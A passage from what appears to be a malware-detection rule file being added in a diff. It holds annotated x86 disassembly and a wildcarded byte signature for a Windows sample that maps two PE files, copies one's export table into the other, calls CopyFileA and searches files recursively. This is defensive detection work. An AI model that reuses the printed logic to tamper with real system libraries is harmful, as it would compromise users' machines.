6800000080 push 0x80000000 + .text:0x004014a7 688c304000 push 0x0040308c + .text:0x004014ac ffd7 call edi ;kernel32.CreateFileA(0x0040308c,0x80000000,1,1,3,1,1) + .text:0x004014ae 8b1d10204000 mov ebx,dword [0x00402010] + .text:0x004014b4 6a00 push 0 + .text:0x004014b6 6a00 push 0 + .text:0x004014b8 6a00 push 0 + .text:0x004014ba 6a02 push 2 + .text:0x004014bc 6a00 push 0 + .text:0x004014be 50 push eax + .text:0x004014bf 89442464 mov dword [esp + 100],eax + .text:0x004014c3 ffd3 call ebx ;kernel32.CreateFileMappingA(kernel32.CreateFileA(0x0040308c,0x80000000,1,1,3,1,1),0,2,0,0,0) + .text:0x004014c5 8b2d0c204000 mov ebp,dword [0x0040200c] + .text:0x004014cb 6a00 push 0 + .text:0x004014cd 6a00 push 0 + .text:0x004014cf 6a00 push 0 + .text:0x004014d1 6a04 push 4 + .text:0x004014d3 50 push eax + .text:0x004014d4 ffd5 call ebp ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x004014ac>,0,2,0,0,0),4,0,0,0) + .text:0x004014d6 6a00 push 0 + .text:0x004014d8 6a00 push 0 + .text:0x004014da 6a03 push 3 + .text:0x004014dc 6a00 
push 0 + .text:0x004014de 6a01 push 1 + .text:0x004014e0 8bf0 mov esi,eax + .text:0x004014e2 6800000010 push 0x10000000 + .text:0x004014e7 687c304000 push 0x0040307c + .text:0x004014ec 89742474 mov dword [esp + 116],esi + .text:0x004014f0 ffd7 call edi ;kernel32.CreateFileA(0x0040307c,0x10000000,1,0,3,0,0) + .text:0x004014f2 83f8ff cmp eax,0xffffffff + .text:0x004014f5 89442450 mov dword [esp + 80],eax + .text:0x004014f9 6a00 push 0 + .text:0x004014fb 7506 jnz 0x00401503 + .text:0x004014fd ff1530204000 call dword [0x00402030] ;msvcrt.exit(0) + .text:0x00401503 loc_00401503: [1 XREFS] + .text:0x00401503 6a00 push 0 + .text:0x00401505 6a00 push 0 + .text:0x00401507 6a04 push 4 + .text:0x00401509 6a00 push 0 + .text:0x0040150b 50 push eax + .text:0x0040150c ffd3 call ebx ;kernel32.CreateFileMappingA(kernel32.CreateFileA(0x0040307c,0x10000000,1,0,3,0,0),0,4,0,0,0) + .text:0x0040150e 83f8ff cmp eax,0xffffffff + .text:0x00401511 6a00 push 0 + .text:0x00401513 7506 jnz 0x0040151b + .text:0x00401515 ff1530204000 call dword [0x00402030] ;msvcrt.exit(0) + .text:0x0040151b loc_0040151b: [1 XREFS] + .text:0x0040151b 6a00 push 0 + .text:0x0040151d 6a00 push 0 + .text:0x0040151f 681f000f00 push 0x000f001f + .text:0x00401524 50 push eax + .text:0x00401525 ffd5 call ebp ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x004014f0>,0,4,0,0,0),0x000f001f,0,0,0) + .text:0x00401527 8be8 mov ebp,eax + .text:0x00401529 85ed test ebp,ebp + .text:0x0040152b 896c245c mov dword [esp + 92],ebp + .text:0x0040152f 7507 jnz 0x00401538 + .text:0x00401531 50 push eax + .text:0x00401532 ff1530204000 call dword [0x00402030] ;msvcrt.exit(<0x00401525>) + .text:0x00401538 loc_00401538: [1 XREFS] + .text:0x00401538 8b7e3c mov edi,dword [esi + 60] + .text:0x0040153b 56 push esi + .text:0x0040153c 03fe add edi,esi + .text:0x0040153e 57 push edi + .text:0x0040153f 897c2440 mov dword [esp + 64],edi + .text:0x00401543 8b4778 mov eax,dword [edi + 120] + .text:0x00401546 50 push eax + .text:0x00401547 
e8f4faffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,kernel32.MapViewOfFile(<0x004014c3>,4,0,0,0)) + .text:0x0040154c 8b753c mov esi,dword [ebp + 60] + .text:0x0040154f 55 push ebp + .text:0x00401550 03f5 add esi,ebp + .text:0x00401552 8bd8 mov ebx,eax + .text:0x00401554 56 push esi + .text:0x00401555 895c2438 mov dword [esp + 56],ebx + .text:0x00401559 8b4e78 mov ecx,dword [esi + 120] + .text:0x0040155c 51 push ecx + .text:0x0040155d e8defaffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bbd170,kernel32.MapViewOfFile(<0x0040150c>,0x000f001f,0,0,0)) + .text:0x00401562 8b542470 mov edx,dword [esp + 112] + .text:0x00401566 8be8 mov ebp,eax + .text:0x00401568 8b431c mov eax,dword [ebx + 28] + .text:0x0040156b 52 push edx + .text:0x0040156c 57 push edi + .text:0x0040156d 50 push eax + .text:0x0040156e e8cdfaffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x00401573 8b4c247c mov ecx,dword [esp + 124] + .text:0x00401577 8b5324 mov edx,dword [ebx + 36] + .text:0x0040157a 51 push ecx + .text:0x0040157b 57 push edi + .text:0x0040157c 52 push edx + .text:0x0040157d 8944244c mov dword [esp + 76],eax + .text:0x00401581 e8bafaffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x00401586 8b4b20 mov ecx,dword [ebx + 32] + .text:0x00401589 89442464 mov dword [esp + 100],eax + .text:0x0040158d 8b842488000000 mov eax,dword [esp + 136] + .text:0x00401594 50 push eax + .text:0x00401595 57 push edi + .text:0x00401596 51 push ecx + .text:0x00401597 e8a4faffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x0040159c 8b942498000000 mov edx,dword [esp + 152] + .text:0x004015a3 8b7e7c mov edi,dword [esi + 124] + .text:0x004015a6 8944246c mov dword [esp + 108],eax + .text:0x004015aa 8b4678 mov eax,dword [esi + 120] + .text:0x004015ad 52 push edx + .text:0x004015ae 56 push esi + .text:0x004015af 50 push eax + .text:0x004015b0 e8bbfaffff call 0x00401070 
;sub_00401070(0x61616161,0xa2bbd170,<0x00401525>) + .text:0x004015b5 8bcf mov ecx,edi + .text:0x004015b7 8bf3 mov esi,ebx + .text:0x004015b9 8bd1 mov edx,ecx + .text:0x004015bb 8bfd mov edi,ebp + .text:0x004015bd c1e902 shr ecx,2 + .text:0x004015c0 f3a5 rep: movsd + .text:0x004015c2 8bca mov ecx,edx + .text:0x004015c4 83c448 add esp,72 + .text:0x004015c7 83e103 and ecx,3 + .text:0x004015ca 8944243c mov dword [esp + 60],eax + .text:0x004015ce f3a4 rep: movsb + .text:0x004015d0 8b4b14 mov ecx,dword [ebx + 20] + .text:0x004015d3 894d14 mov dword [ebp + 20],ecx + .text:0x004015d6 8b5318 mov edx,dword [ebx + 24] + .text:0x004015d9 8d5d28 lea ebx,dword [ebp + 40] + .text:0x004015dc 895518 mov dword [ebp + 24],edx + .text:0x004015df c1e104 shl ecx,4 + .text:0x004015e2 8d1403 lea edx,dword [ebx + eax] + .text:0x004015e5 89550c mov dword [ebp + 12],edx + .text:0x004015e8 8b3510304000 mov esi,dword [0x00403010] + .text:0x004015ee 8bd3 mov edx,ebx + .text:0x004015f0 83c310 add ebx,16 + .text:0x004015f3 895c2420 mov dword [esp + 32],ebx + .text:0x004015f7 8932 mov dword [edx],esi + .text:0x004015f9 8b3514304000 mov esi,dword [0x00403014] + .text:0x004015ff 897204 mov dword [edx + 4],esi + .text:0x00401602 8b3518304000 mov esi,dword [0x00403018] + .text:0x00401608 897208 mov dword [edx + 8],esi + .text:0x0040160b 8b351c304000 mov esi,dword [0x0040301c] + .text:0x00401611 89720c mov dword [edx + 12],esi + .text:0x00401614 8b5514 mov edx,dword [ebp + 20] + .text:0x00401617 8d3493 lea esi,dword [ebx + edx * 4] + .text:0x0040161a 8d3cd3 lea edi,dword [ebx + edx * 8] + .text:0x0040161d 89742448 mov dword [esp + 72],esi + .text:0x00401621 897c2444 mov dword [esp + 68],edi + .text:0x00401625 8d1403 lea edx,dword [ebx + eax] + .text:0x00401628 03d9 add ebx,ecx + .text:0x0040162a 89551c mov dword [ebp + 28],edx + .text:0x0040162d 8d1406 lea edx,dword [esi + eax] + .text:0x00401630 03c7 add eax,edi + .text:0x00401632 895524 mov dword [ebp + 36],edx + .text:0x00401635 894520 mov dword 
[ebp + 32],eax + .text:0x00401638 8b442424 mov eax,dword [esp + 36] + .text:0x0040163c 33c9 xor ecx,ecx + .text:0x0040163e 33d2 xor edx,edx + .text:0x00401640 8b6814 mov ebp,dword [eax + 20] + .text:0x00401643 894c245c mov dword [esp + 92],ecx + .text:0x00401647 85ed test ebp,ebp + .text:0x00401649 8954242c mov dword [esp + 44],edx + .text:0x0040164d 0f8681010000 jbe 0x004017d4 + .text:0x00401653 loc_00401653: [1 XREFS] + .text:0x00401653 8b6c241c mov ebp,dword [esp + 28] + .text:0x00401657 837d0000 cmp dword [ebp],0 + .text:0x0040165b 0f8458010000 jz 0x004017b9 + .text:0x00401661 8b6818 mov ebp,dword [eax + 24] + .text:0x00401664 c744242800000000 mov dword [esp + 40],0 + .text:0x0040166c 85ed test ebp,ebp + .text:0x0040166e 0f8645010000 jbe 0x004017b9 + .text:0x00401674 8b6c2420 mov ebp,dword [esp + 32] + .text:0x00401678 8d6c8d00 lea ebp,dword [ebp + ecx * 4] + .text:0x0040167c 8d0c4e lea ecx,dword [esi + ecx * 2] + .text:0x0040167f 8b742420 mov esi,dword [esp + 32] + .text:0x00401683 894c2410 mov dword [esp + 16],ecx + .text:0x00401687 8b4c2430 mov ecx,dword [esp + 48] + .text:0x0040168b 894c2418 mov dword [esp + 24],ecx + .text:0x0040168f 8b4c2434 mov ecx,dword [esp + 52] + .text:0x00401693 894c2414 mov dword [esp + 20],ecx + .text:0x00401697 8bcf mov ecx,edi + .text:0x00401699 2bce sub ecx,esi + .text:0x0040169b 894c2440 mov dword [esp + 64],ecx + .text:0x0040169f loc_0040169f: [1 XREFS] + .text:0x0040169f 8b742414 mov esi,dword [esp + 20] + .text:0x004016a3 33c9 xor ecx,ecx + .text:0x004016a5 668b0e mov cx,word [esi] + .text:0x004016a8 3bca cmp ecx,edx + .text:0x004016aa 0f85d3000000 jnz 0x00401783 + .text:0x004016b0 8b542458 mov edx,dword [esp + 88] + .text:0x004016b4 8b4c2418 mov ecx,dword [esp + 24] + .text:0x004016b8 8b442438 mov eax,dword [esp + 56] + .text:0x004016bc 52 push edx + .text:0x004016bd 8b11 mov edx,dword [ecx] + .text:0x004016bf 50 push eax + .text:0x004016c0 52 push edx + .text:0x004016c1 e87af9ffff call 0x00401040 
;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x004016c6 8bd0 mov edx,eax + .text:0x004016c8 83c9ff or ecx,0xffffffff + .text:0x004016cb 8bfa mov edi,edx + .text:0x004016cd 33c0 xor eax,eax + .text:0x004016cf 83c40c add esp,12 + .text:0x004016d2 8bf2 mov esi,edx + .text:0x004016d4 f2ae repnz: scasb + .text:0x004016d6 f7d1 not ecx + .text:0x004016d8 8bc1 mov eax,ecx + .text:0x004016da 8bfb mov edi,ebx + .text:0x004016dc c1e902 shr ecx,2 + .text:0x004016df f3a5 rep: movsd + .text:0x004016e1 8bc8 mov ecx,eax + .text:0x004016e3 8b442410 mov eax,dword [esp + 16] + .text:0x004016e7 83e103 and ecx,3 + .text:0x004016ea f3a4 rep: movsb + .text:0x004016ec 668b4c245c mov cx,word [esp + 92] + .text:0x004016f1 8b74243c mov esi,dword [esp + 60] + .text:0x004016f5 668908 mov word [eax],cx + .text:0x004016f8 8b442440 mov eax,dword [esp + 64] + .text:0x004016fc 8d0c33 lea ecx,dword [ebx + esi] + .text:0x004016ff 8bfa mov edi,edx + .text:0x00401701 890c28 mov dword [eax + ebp],ecx + .text:0x00401704 83c9ff or ecx,0xffffffff + .text:0x00401707 33c0 xor eax,eax + .text:0x00401709 f2ae repnz: scasb + .text:0x0040170b f7d1 not ecx + .text:0x0040170d 49 dec ecx + .text:0x0040170e 8bfa mov edi,edx + .text:0x00401710 8d5c0b01 lea ebx,dword [ebx + ecx + 1] + .text:0x00401714 8bc3 mov eax,ebx + .text:0x00401716 8d0c33 lea ecx,dword [ebx + esi] + .text:0x00401719 83c309 add ebx,9 + .text:0x0040171c 894d00 mov dword [ebp],ecx + .text:0x0040171f 8b0d70304000 mov ecx,dword [0x00403070] + .text:0x00401725 8908 mov dword [eax],ecx + .text:0x00401727 8b0d74304000 mov ecx,dword [0x00403074] + .text:0x0040172d 8bf2 mov esi,edx + .text:0x0040172f 894804 mov dword [eax + 4],ecx + .text:0x00401732 8a0d78304000 mov cl,byte [0x00403078] + .text:0x00401738 884808 mov byte [eax + 8],cl + .text:0x0040173b 83c9ff or ecx,0xffffffff + .text:0x0040173e 33c0 xor eax,eax + .text:0x00401740 f2ae repnz: scasb + .text:0x00401742 f7d1 not ecx + .text:0x00401744 8bc1 mov eax,ecx + .text:0x00401746 8bfb mov 
edi,ebx + .text:0x00401748 c1e902 shr ecx,2 + .text:0x0040174b f3a5 rep: movsd + .text:0x0040174d 8bc8 mov ecx,eax + .text:0x0040174f 33c0 xor eax,eax + .text:0x00401751 83e103 and ecx,3 + .text:0x00401754 f3a4 rep: movsb + .text:0x00401756 8bfa mov edi,edx + .text:0x00401758 83c9ff or ecx,0xffffffff + .text:0x0040175b f2ae repnz: scasb + .text:0x0040175d 8b54245c mov edx,dword [esp + 92] + .text:0x00401761 8b442424 mov eax,dword [esp + 36] + .text:0x00401765 f7d1 not ecx + .text:0x00401767 49 dec ecx + .text:0x00401768 42 inc edx + .text:0x00401769 8954245c mov dword [esp + 92],edx + .text:0x0040176d 8b54242c mov edx,dword [esp + 44] + .text:0x00401771 8d5c0b01 lea ebx,dword [ebx + ecx + 1] + .text:0x00401775 8b4c2410 mov ecx,dword [esp + 16] + .text:0x00401779 83c102 add ecx,2 + .text:0x0040177c 83c504 add ebp,4 + .text:0x0040177f 894c2410 mov dword [esp + 16],ecx + .text:0x00401783 loc_00401783: [1 XREFS] + .text:0x00401783 8b742414 mov esi,dword [esp + 20] + .text:0x00401787 8b4c2428 mov ecx,dword [esp + 40] + .text:0x0040178b 8b7c2418 mov edi,dword [esp + 24] + .text:0x0040178f 83c602 add esi,2 + .text:0x00401792 89742414 mov dword [esp + 20],esi + .text:0x00401796 8b7018 mov esi,dword [eax + 24] + .text:0x00401799 41 inc ecx + .text:0x0040179a 83c704 add edi,4 + .text:0x0040179d 3bce cmp ecx,esi + .text:0x0040179f 894c2428 mov dword [esp + 40],ecx + .text:0x004017a3 897c2418 mov dword [esp + 24],edi + .text:0x004017a7 0f82f2feffff jc 0x0040169f + .text:0x004017ad 8b4c245c mov ecx,dword [esp + 92] + .text:0x004017b1 8b7c2444 mov edi,dword [esp + 68] + .text:0x004017b5 8b742448 mov esi,dword [esp + 72] + .text:0x004017b9 loc_004017b9: [2 XREFS] + .text:0x004017b9 8b6c241c mov ebp,dword [esp + 28] + .text:0x004017bd 42 inc edx + .text:0x004017be 83c504 add ebp,4 + .text:0x004017c1 8954242c mov dword [esp + 44],edx + .text:0x004017c5 896c241c mov dword [esp + 28],ebp + .text:0x004017c9 8b6814 mov ebp,dword [eax + 20] + .text:0x004017cc 3bd5 cmp edx,ebp + 
.text:0x004017ce 0f827ffeffff jc 0x00401653 + .text:0x004017d4 loc_004017d4: [1 XREFS] + .text:0x004017d4 8b4c244c mov ecx,dword [esp + 76] + .text:0x004017d8 8b3500204000 mov esi,dword [0x00402000] + .text:0x004017de 51 push ecx + .text:0x004017df ffd6 call esi ;kernel32.CloseHandle(<0x004014ac>) + .text:0x004017e1 8b542450 mov edx,dword [esp + 80] + .text:0x004017e5 52 push edx + .text:0x004017e6 ffd6 call esi ;kernel32.CloseHandle(<0x004014f0>) + .text:0x004017e8 6a00 push 0 + .text:0x004017ea 684c304000 push 0x0040304c + .text:0x004017ef 687c304000 push 0x0040307c + .text:0x004017f4 ff1524204000 call dword [0x00402024] ;kernel32.CopyFileA(0x0040307c,0x0040304c,0) + .text:0x004017fa 85c0 test eax,eax + .text:0x004017fc 6a00 push 0 + .text:0x004017fe 7506 jnz 0x00401806 + .text:0x00401800 ff1530204000 call dword [0x00402030] ;msvcrt.exit(0) + .text:0x00401806 loc_00401806: [1 XREFS] + .text:0x00401806 6844304000 push 0x00403044 + .text:0x0040180b e8d0f9ffff call 0x004011e0 ;sub_004011e0(0x00403044,0) + .text:0x00401810 83c408 add esp,8 + .text:0x00401813 loc_00401813: [2 XREFS] + .text:0x00401813 5f pop edi + .text:0x00401814 5e pop esi + .text:0x00401815 5d pop ebp + .text:0x00401816 33c0 xor eax,eax + .text:0x00401818 5b pop ebx + .text:0x00401819 83c444 add esp,68 + .text:0x0040181c c3 ret + */ + $c0 = { 8B 44 24 ?? 83 EC 44 83 F8 02 53 55 56 57 0F 85 ?? ?? ?? ?? 8B 44 24 ?? BE B0 30 40 00 8B 40 ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? 83 C0 02 83 C6 02 84 C9 75 ?? 33 C0 EB ?? 1B C0 83 D8 FF 85 C0 0F 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 50 6A 03 50 6A 01 68 00 00 00 80 68 8C 30 40 00 FF D7 8B 1D ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 6A 00 50 89 44 24 ?? FF D3 8B 2D ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 04 50 FF D5 6A 00 6A 00 6A 03 6A 00 6A 01 8B F0 68 00 00 00 10 68 7C 30 40 00 89 74 24 ?? FF D7 83 F8 FF 89 44 24 ?? 6A 00 75 ?? FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 04 6A 00 50 FF D3 83 F8 FF 6A 00 75 ?? FF 15 ?? ?? ?? ?? 
6A 00 6A 00 68 1F 00 0F 00 50 FF D5 8B E8 85 ED 89 6C 24 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 8B 7E ?? 56 03 FE 57 89 7C 24 ?? 8B 47 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 55 03 F5 8B D8 56 89 5C 24 ?? 8B 4E ?? 51 E8 ?? ?? ?? ?? 8B 54 24 ?? 8B E8 8B 43 ?? 52 57 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 53 ?? 51 57 52 89 44 24 ?? E8 ?? ?? ?? ?? 8B 4B ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 50 57 51 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 7E ?? 89 44 24 ?? 8B 46 ?? 52 56 50 E8 ?? ?? ?? ?? 8B CF 8B F3 8B D1 8B FD C1 E9 02 F3 A5 8B CA 83 C4 48 83 E1 03 89 44 24 ?? F3 A4 8B 4B ?? 89 4D ?? 8B 53 ?? 8D 5D ?? 89 55 ?? C1 E1 04 8D 14 03 89 55 ?? 8B 35 ?? ?? ?? ?? 8B D3 83 C3 10 89 5C 24 ?? 89 32 8B 35 ?? ?? ?? ?? 89 72 ?? 8B 35 ?? ?? ?? ?? 89 72 ?? 8B 35 ?? ?? ?? ?? 89 72 ?? 8B 55 ?? 8D 34 93 8D 3C D3 89 74 24 ?? 89 7C 24 ?? 8D 14 03 03 D9 89 55 ?? 8D 14 06 03 C7 89 55 ?? 89 45 ?? 8B 44 24 ?? 33 C9 33 D2 8B 68 ?? 89 4C 24 ?? 85 ED 89 54 24 ?? 0F 86 ?? ?? ?? ?? 8B 6C 24 ?? 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 68 ?? C7 44 24 ?? 00 00 00 00 85 ED 0F 86 ?? ?? ?? ?? 8B 6C 24 ?? 8D 6C 8D ?? 8D 0C 4E 8B 74 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B CF 2B CE 89 4C 24 ?? 8B 74 24 ?? 33 C9 66 8B 0E 3B CA 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? 52 8B 11 50 52 E8 ?? ?? ?? ?? 8B D0 83 C9 FF 8B FA 33 C0 83 C4 0C 8B F2 F2 AE F7 D1 8B C1 8B FB C1 E9 02 F3 A5 8B C8 8B 44 24 ?? 83 E1 03 F3 A4 66 8B 4C 24 ?? 8B 74 24 ?? 66 89 08 8B 44 24 ?? 8D 0C 33 8B FA 89 0C 28 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FA 8D 5C 0B ?? 8B C3 8D 0C 33 83 C3 09 89 4D ?? 8B 0D ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8B F2 89 48 ?? 8A 0D ?? ?? ?? ?? 88 48 ?? 83 C9 FF 33 C0 F2 AE F7 D1 8B C1 8B FB C1 E9 02 F3 A5 8B C8 33 C0 83 E1 03 F3 A4 8B FA 83 C9 FF F2 AE 8B 54 24 ?? 8B 44 24 ?? F7 D1 49 42 89 54 24 ?? 8B 54 24 ?? 8D 5C 0B ?? 8B 4C 24 ?? 83 C1 02 83 C5 04 89 4C 24 ?? 8B 74 24 ?? 8B 4C 24 ?? 8B 7C 24 ?? 83 C6 02 89 74 24 ?? 8B 70 ?? 41 83 C7 04 3B CE 89 4C 24 ?? 89 7C 24 ?? 0F 82 ?? ?? ?? ?? 8B 4C 24 ?? 8B 7C 24 ?? 
8B 74 24 ?? 8B 6C 24 ?? 42 83 C5 04 89 54 24 ?? 89 6C 24 ?? 8B 68 ?? 3B D5 0F 82 ?? ?? ?? ?? 8B 4C 24 ?? 8B 35 ?? ?? ?? ?? 51 FF D6 8B 54 24 ?? 52 FF D6 6A 00 68 4C 30 40 00 68 7C 30 40 00 FF 15 ?? ?? ?? ?? 85 C0 6A 00 75 ?? FF 15 ?? ?? ?? ?? 68 44 30 40 00 E8 ?? ?? ?? ?? 83 C4 08 5F 5E 5D 33 C0 5B 83 C4 44 C3 } + /* +function at 0x004011e0@bb7425b82141a1c0f7d60e5106676bb1 with 2 features: + - enumerate files on Windows + - enumerate files recursively + .text:0x004011e0 + .text:0x004011e0 FUNC: int cdecl sub_004011e0( int arg0, int arg1, ) [4 XREFS] + .text:0x004011e0 + .text:0x004011e0 Stack Variables: (offset from initial top of stack) + .text:0x004011e0 8: int arg1 + .text:0x004011e0 4: int arg0 + .text:0x004011e0 -275: int local275 + .text:0x004011e0 -276: int local276 + .text:0x004011e0 -281: int local281 + .text:0x004011e0 -320: int local320 + .text:0x004011e0 -324: int local324 + .text:0x004011e0 + .text:0x004011e0 8b442408 mov eax,dword [esp + 8] + .text:0x004011e4 81ec44010000 sub esp,324 + .text:0x004011ea 83f807 cmp eax,7 + .text:0x004011ed 53 push ebx + .text:0x004011ee 55 push ebp + .text:0x004011ef 56 push esi + .text:0x004011f0 57 push edi + .text:0x004011f1 0f8f3d020000 jg 0x00401434 + .text:0x004011f7 8bac2458010000 mov ebp,dword [esp + 344] + .text:0x004011fe 8d442414 lea eax,dword [esp + 20] + .text:0x00401202 50 push eax + .text:0x00401203 55 push ebp + .text:0x00401204 ff1520204000 call dword [0x00402020] ;kernel32.FindFirstFileA(arg0,local320) + .text:0x0040120a 8bf0 mov esi,eax + .text:0x0040120c 89742410 mov dword [esp + 16],esi + .text:0x00401210 loc_00401210: [1 XREFS] + .text:0x00401210 83feff cmp esi,0xffffffff + .text:0x00401213 0f8413020000 jz 0x0040142c + .text:0x00401219 f644241410 test byte [esp + 20],16 + .text:0x0040121e 0f8438010000 jz 0x0040135c + .text:0x00401224 be40304000 mov esi,0x00403040 + .text:0x00401229 8d442440 lea eax,dword [esp + 64] + .text:0x0040122d loc_0040122d: [1 XREFS] + .text:0x0040122d 8a10 mov dl,byte [eax] 
+ .text:0x0040122f 8a1e mov bl,byte [esi] + .text:0x00401231 8aca mov cl,dl + .text:0x00401233 3ad3 cmp dl,bl + .text:0x00401235 751e jnz 0x00401255 + .text:0x00401237 84c9 test cl,cl + .text:0x00401239 7416 jz 0x00401251 + .text:0x0040123b 8a5001 mov dl,byte [eax + 1] + .text:0x0040123e 8a5e01 mov bl,byte [esi + 1] + .text:0x00401241 8aca mov cl,dl + .text:0x00401243 3ad3 cmp dl,bl + .text:0x00401245 750e jnz 0x00401255 + .text:0x00401247 83c002 add eax,2 + .text:0x0040124a 83c602 add esi,2 + .text:0x0040124d 84c9 test cl,cl + .text:0x0040124f 75dc jnz 0x0040122d + .text:0x00401251 loc_00401251: [1 XREFS] + .text:0x00401251 33c0 xor eax,eax + .text:0x00401253 eb05 jmp 0x0040125a + .text:0x00401255 loc_00401255: [2 XREFS] + .text:0x00401255 1bc0 sbb eax,eax + .text:0x00401257 83d8ff sbb eax,0xffffffff + .text:0x0040125a loc_0040125a: [1 XREFS] + .text:0x0040125a 85c0 test eax,eax + .text:0x0040125c 0f84fa000000 jz 0x0040135c + .text:0x00401262 be3c304000 mov esi,0x0040303c + .text:0x00401267 8d442440 lea eax,dword [esp + 64] + .text:0x0040126b loc_0040126b: [1 XREFS] + .text:0x0040126b 8a10 mov dl,byte [eax] + .text:0x0040126d 8a1e mov bl,byte [esi] + .text:0x0040126f 8aca mov cl,dl + .text:0x00401271 3ad3 cmp dl,bl + .text:0x00401273 751e jnz 0x00401293 + .text:0x00401275 84c9 test cl,cl + .text:0x00401277 7416 jz 0x0040128f + .text:0x00401279 8a5001 mov dl,byte [eax + 1] + .text:0x0040127c 8a5e01 mov bl,byte [esi + 1] + .text:0x0040127f 8aca mov cl,dl + .text:0x00401281 3ad3 cmp dl,bl + .text:0x00401283 750e jnz 0x00401293 + .text:0x00401285 83c002 add eax,2 + .text:0x00401288 83c602 add esi,2 + .text:0x0040128b 84c9 test cl,cl + .text:0x0040128d 75dc jnz 0x0040126b + .text:0x0040128f loc_0040128f: [1 XREFS] + .text:0x0040128f 33c0 xor eax,eax + .text:0x00401291 eb05 jmp 0x00401298 + .text:0x00401293 loc_00401293: [2 XREFS] + .text:0x00401293 1bc0 sbb eax,eax + .text:0x00401295 83d8ff sbb eax,0xffffffff + .text:0x00401298 loc_00401298: [1 XREFS] + 
.text:0x00401298 85c0 test eax,eax + .text:0x0040129a 0f84bc000000 jz 0x0040135c + .text:0x004012a0 8d7c2440 lea edi,dword [esp + 64] + .text:0x004012a4 83c9ff or ecx,0xffffffff + .text:0x004012a7 33c0 xor eax,eax + .text:0x004012a9 f2ae repnz: scasb + .text:0x004012ab f7d1 not ecx + .text:0x004012ad 49 dec ecx + .text:0x004012ae 8bfd mov edi,ebp + .text:0x004012b0 8bd1 mov edx,ecx + .text:0x004012b2 83c9ff or ecx,0xffffffff + .text:0x004012b5 f2ae repnz: scasb + .text:0x004012b7 f7d1 not ecx + .text:0x004012b9 49 dec ecx + .text:0x004012ba 8d445106 lea eax,dword [ecx + edx * 2 + 6] + .text:0x004012be 50 push eax + .text:0x004012bf ff152c204000 call dword [0x0040202c] ;msvcrt.malloc(3) + .text:0x004012c5 8bd0 mov edx,eax + .text:0x004012c7 83c9ff or ecx,0xffffffff + .text:0x004012ca 8bfd mov edi,ebp + .text:0x004012cc 33c0 xor eax,eax + .text:0x004012ce f2ae repnz: scasb + .text:0x004012d0 f7d1 not ecx + .text:0x004012d2 2bf9 sub edi,ecx + .text:0x004012d4 8bc1 mov eax,ecx + .text:0x004012d6 8bf7 mov esi,edi + .text:0x004012d8 c1e902 shr ecx,2 + .text:0x004012db 8bfa mov edi,edx + .text:0x004012dd f3a5 rep: movsd + .text:0x004012df 8bc8 mov ecx,eax + .text:0x004012e1 33c0 xor eax,eax + .text:0x004012e3 83e103 and ecx,3 + .text:0x004012e6 f3a4 rep: movsb + .text:0x004012e8 83c9ff or ecx,0xffffffff + .text:0x004012eb 8bfd mov edi,ebp + .text:0x004012ed f2ae repnz: scasb + .text:0x004012ef f7d1 not ecx + .text:0x004012f1 49 dec ecx + .text:0x004012f2 8d7c2444 lea edi,dword [esp + 68] + .text:0x004012f6 884411ff mov byte [ecx + edx + -1],al + .text:0x004012fa 83c9ff or ecx,0xffffffff + .text:0x004012fd f2ae repnz: scasb + .text:0x004012ff f7d1 not ecx + .text:0x00401301 2bf9 sub edi,ecx + .text:0x00401303 8bf7 mov esi,edi + .text:0x00401305 8bd9 mov ebx,ecx + .text:0x00401307 8bfa mov edi,edx + .text:0x00401309 83c9ff or ecx,0xffffffff + .text:0x0040130c f2ae repnz: scasb + .text:0x0040130e 8bcb mov ecx,ebx + .text:0x00401310 4f dec edi + .text:0x00401311 c1e902 shr 
ecx,2 + .text:0x00401314 f3a5 rep: movsd + .text:0x00401316 8bcb mov ecx,ebx + .text:0x00401318 83e103 and ecx,3 + .text:0x0040131b f3a4 rep: movsb + .text:0x0040131d bf38304000 mov edi,0x00403038 + .text:0x00401322 83c9ff or ecx,0xffffffff + .text:0x00401325 f2ae repnz: scasb + .text:0x00401327 f7d1 not ecx + .text:0x00401329 2bf9 sub edi,ecx + .text:0x0040132b 8bf7 mov esi,edi + .text:0x0040132d 8bd9 mov ebx,ecx + .text:0x0040132f 8bfa mov edi,edx + .text:0x00401331 83c9ff or ecx,0xffffffff + .text:0x00401334 f2ae repnz: scasb + .text:0x00401336 8bcb mov ecx,ebx + .text:0x00401338 4f dec edi + .text:0x00401339 c1e902 shr ecx,2 + .text:0x0040133c f3a5 rep: movsd + .text:0x0040133e 8bcb mov ecx,ebx + .text:0x00401340 83e103 and ecx,3 + .text:0x00401343 f3a4 rep: movsb + .text:0x00401345 8b8c2460010000 mov ecx,dword [esp + 352] + .text:0x0040134c 41 inc ecx + .text:0x0040134d 51 push ecx + .text:0x0040134e 52 push edx + .text:0x0040134f e88cfeffff call 0x004011e0 ;sub_004011e0() + .text:0x00401354 83c40c add esp,12 + .text:0x00401357 e9b7000000 jmp 0x00401413 + .text:0x0040135c loc_0040135c: [3 XREFS] + .text:0x0040135c 8d7c2440 lea edi,dword [esp + 64] + .text:0x00401360 